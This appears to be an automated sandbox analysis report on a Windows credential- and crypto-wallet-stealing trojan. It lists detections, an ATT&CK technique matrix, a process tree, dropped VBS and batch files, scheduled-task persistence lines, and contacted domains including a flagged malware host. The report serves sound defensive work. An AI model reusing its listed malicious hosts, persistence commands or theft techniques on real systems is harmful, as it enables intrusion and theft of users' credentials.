              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusRule
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: EthereumRule
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
              Source: Inebriato.exe.comBinary or memory string: WIN_81
              Source: Inebriato.exe.comBinary or memory string: WIN_XP
              Source: Uno.exe.com, 0000000A.00000000.1707241910.0000000000AC3000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: Inebriato.exe.comBinary or memory string: WIN_XPe
              Source: Inebriato.exe.comBinary or memory string: WIN_VISTA
              Source: Inebriato.exe.comBinary or memory string: WIN_7
              Source: Inebriato.exe.comBinary or memory string: WIN_8
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CB204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_00CB204C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CB1A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,7_2_00CB1A4A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A8204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00A8204C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A81A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00A81A4A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0062204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_0062204C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00621A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,13_2_00621A4A
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information312
              Scripting
              2
              Valid Accounts
              1
              Native API
              312
              Scripting
              1
              Exploitation for Privilege Escalation
              211
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              121
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol2
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job
              1
              Create Account
              2
              Valid Accounts
              2
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares121
              Input Capture
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              2
              Valid Accounts
              21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS36
              System Information Discovery
              Distributed Component Object Model3
              Clipboard Data
              113
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Scheduled Task/Job
              312
              Process Injection
              113
              Masquerading
              LSA Secrets121
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job
              2
              Valid Accounts
              Cached Domain Credentials131
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
              Virtualization/Sandbox Evasion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
              Process Injection
              Network Sniffing1
              Remote System Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Hidden Users
              Input Capture1
              System Network Configuration Discovery
              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581194 Sample: 8lOT1rXZp5.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 143 lYvskCQZEcQueZ.lYvskCQZEcQueZ 2->143 145 bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv 2->145 147 3 other IPs or domains 2->147 171 Found malware configuration 2->171 173 Malicious sample detected (through community Yara rule) 2->173 175 Antivirus detection for URL or domain 2->175 177 12 other signatures 2->177 14 8lOT1rXZp5.exe 11 2->14         started        17 wscript.exe 2->17         started        21 wscript.exe 2->21         started        signatures3 process4 dnsIp5 205 Found many strings related to Crypto-Wallets (likely being stolen) 14->205 207 Contains functionality to register a low level keyboard hook 14->207 23 cmd.exe 1 14->23         started        26 makecab.exe 1 14->26         started        141 raw.githubusercontent.com 185.199.111.133, 443, 49842 FASTLYUS Netherlands 17->141 125 C:\Program Files\RDP Wrapper\rdpwrap.bat, exported 17->125 dropped 209 System process connects to network (likely due to code injection or exploit) 17->209 211 Wscript starts Powershell (via cmd or directly) 17->211 213 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->213 28 cmd.exe 17->28         started        127 C:\Users\user\AppData\...\BACCrSAh.bat, DOS 21->127 dropped 30 cmd.exe 21->30         started        file6 signatures7 process8 signatures9 179 Wscript starts Powershell (via cmd or directly) 23->179 181 Obfuscated command line found 23->181 183 Uses ping.exe to sleep 23->183 185 6 other signatures 23->185 32 cmd.exe 7 23->32         started        36 conhost.exe 23->36         started        38 conhost.exe 26->38         started        40 conhost.exe 28->40         started        42 fsutil.exe 28->42         started        44 cmd.exe 30->44         started        46 cmd.exe 30->46         started        48 conhost.exe 30->48         started        process10 file11 117 C:\Users\user\AppData\Roaming\...\Uno.exe.com, PE32 32->117 dropped 119 C:\Users\user\AppData\...\Rifiutare.exe.com, PE32 32->119 dropped 121 C:\Users\user\AppData\...\Inebriato.exe.com, PE32 32->121 dropped 123 C:\Users\user\AppData\Roaming\...\R, ASCII 32->123 dropped 165 Obfuscated command line found 32->165 167 Uses ping.exe to sleep 32->167 50 Inebriato.exe.com 32->50         started        53 Rifiutare.exe.com 32->53         started        55 Uno.exe.com 32->55         started        61 4 other processes 32->61 57 WMIC.exe 44->57         started        59 WMIC.exe 46->59         started        signatures12 process13 dnsIp14 169 Found API chain indicative of sandbox detection 50->169 64 Inebriato.exe.com 50->64         started        67 Rifiutare.exe.com 1 53->67         started        70 Uno.exe.com 55->70         started        149 127.0.0.1 unknown unknown 61->149 signatures15 process16 file17 151 Writes to foreign memory regions 64->151 153 Injects a PE file into a foreign processes 64->153 72 RegAsm.exe 64->72         started        129 C:\Users\user\AppData\Roaming\...\RegAsm.exe, PE32 67->129 dropped 155 Found many strings related to Crypto-Wallets (likely being stolen) 67->155 76 RegAsm.exe 15 2 67->76         started        78 RegAsm.exe 70->78         started        signatures18 process19 file20 135 C:\Users\user\AppData\...\UILIklkzCJ.bat, DOS 72->135 dropped 137 C:\Users\user\AppData\Roaming\UeNuQ\578.vbs, ASCII 72->137 dropped 139 C:\Users\user\AppData\Roaming\...\1186.vbs, Unicode 72->139 dropped 187 Modifies Windows Defender protection settings 72->187 189 Adds a directory exclusion to Windows Defender 72->189 80 cmd.exe 72->80         started        83 cmd.exe 72->83         started        85 cmd.exe 72->85         started        87 7 other processes 72->87 191 Potential malicious VBS script found (suspicious strings) 76->191 193 Potential malicious VBS script found (has network functionality) 76->193 195 Tries to harvest and steal browser information (history, passwords, etc) 78->195 signatures21 process22 signatures23 157 Wscript starts Powershell (via cmd or directly) 80->157 159 Adds a directory exclusion to Windows Defender 80->159 89 powershell.exe 80->89         started        92 conhost.exe 80->92         started        94 powershell.exe 83->94         started        96 conhost.exe 83->96         started        161 Modifies Windows Defender protection settings 85->161 98 powershell.exe 85->98         started        100 conhost.exe 85->100         started        163 Adds a new user with administrator rights 87->163 102 cscript.exe 87->102         started        105 powershell.exe 87->105         started        107 18 other processes 87->107 process24 file25 197 Loading BitLocker PowerShell Module 89->197 131 C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ASCII 102->131 dropped 199 Potential malicious VBS script found (suspicious strings) 102->199 201 Potential malicious VBS script found (has network functionality) 102->201 133 C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll, XML 107->133 dropped 203 Hides user accounts 107->203 109 WMIC.exe 107->109         started        111 WMIC.exe 107->111         started        113 net1.exe 107->113         started        115 3 other processes 107->115 signatures26 process27

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              8lOT1rXZp5.exe54%VirustotalBrowse
              8lOT1rXZp5.exe53%ReversingLabsWin32.Trojan.Valyria
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\UeNuQ\939.vbs100%AviraVBS/Dldr.Agent.VPGN
              C:\Users\user\AppData\Roaming\UeNuQ\578.vbs100%AviraVBS/Agent.4358
              C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com5%ReversingLabs
              C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe0%ReversingLabs
              C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com5%ReversingLabs
              C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com5%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              21jhss.club:80100%Avira URL Cloudmalware
              https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              raw.githubusercontent.com
              185.199.111.133
              truefalse
                high
                lYvskCQZEcQueZ.lYvskCQZEcQueZ
                unknown
                unknowntrue
                  unknown
                  bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv
                  unknown
                  unknowntrue
                    unknown
                    21jhss.club
                    unknown
                    unknowntrue
                      unknown
                      QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlan
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.batfalse
                          high
                          21jhss.club:80true
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ipinfo.io/ip%appdata%Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://api.ipify.orgRifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.autoitscript.com/autoit3/X8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Rifiutare.exe.com, 00000009.00000000.1706363695.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Uno.exe.com, 0000000A.00000000.1707300131.0000000000AD5000.00000002.00000001.01000000.00000007.sdmpfalse
                                high
                                https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dyRifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdawscript.exefalse
                                  high
                                  https://www.autoitscript.com/autoit3/8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.ip.sb/geoipAppDataRifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.199.111.133
                                      raw.githubusercontent.comNetherlands
                                      54113FASTLYUSfalse
                                      IP
                                      127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1581194
                                      Start date and time:2024-12-27 08:18:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 28s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:77
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:8lOT1rXZp5.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:34807a743f2d680eef051852eaef0b16.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@139/54@23/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 97
                                      • Number of non-executed functions: 295
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 172.202.163.200
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      02:19:36API Interceptor1x Sleep call for process: Uno.exe.com modified
                                      02:19:36API Interceptor10x Sleep call for process: Inebriato.exe.com modified
                                      02:20:07API Interceptor19646x Sleep call for process: RegAsm.exe modified
                                      02:20:30API Interceptor46x Sleep call for process: powershell.exe modified
                                      02:20:44API Interceptor4x Sleep call for process: WMIC.exe modified
                                      02:20:47API Interceptor2x Sleep call for process: wscript.exe modified
                                      07:20:43Task SchedulerRun new task: Adobe Acrobat Update Task53 path: C:\Users\user\AppData\Roaming\UeNuQ\578.vbs s>fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat"
                                      07:20:43Task SchedulerRun new task: CCleaner Update79 path: C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      raw.githubusercontent.comPurchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                      • 185.199.108.133
                                      YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.109.133
                                      YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.110.133
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                      • 185.199.110.133
                                      Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.110.133
                                      BigProject.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.110.133
                                      Set-up!.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.108.133
                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                      • 185.199.108.133
                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                      • 185.199.111.133
                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                      • 185.199.108.133
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      FASTLYUSphish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                      • 151.101.194.137
                                      https://contractnerds.com/Get hashmaliciousUnknownBrowse
                                      • 151.101.193.21
                                      ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                      • 151.101.193.91
                                      http://booking.extranetguests.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                      • 151.101.194.137
                                      Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                      • 151.101.192.217
                                      xd.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 23.185.30.197
                                      https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.194.137
                                      https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                      • 151.101.65.229
                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                      • 185.199.108.133
                                      https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                      • 151.101.2.137
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      a0e9f5d64349fb13191bc781f81f42e16wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                      • 185.199.111.133
                                      uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      setup.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                      • 185.199.111.133
                                      atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                      • 185.199.111.133
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com99awhy8l.exeGet hashmaliciousLummaCBrowse
                                        eRApzqPkL1.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          eRApzqPkL1.exeGet hashmaliciousRHADAMANTHYSBrowse
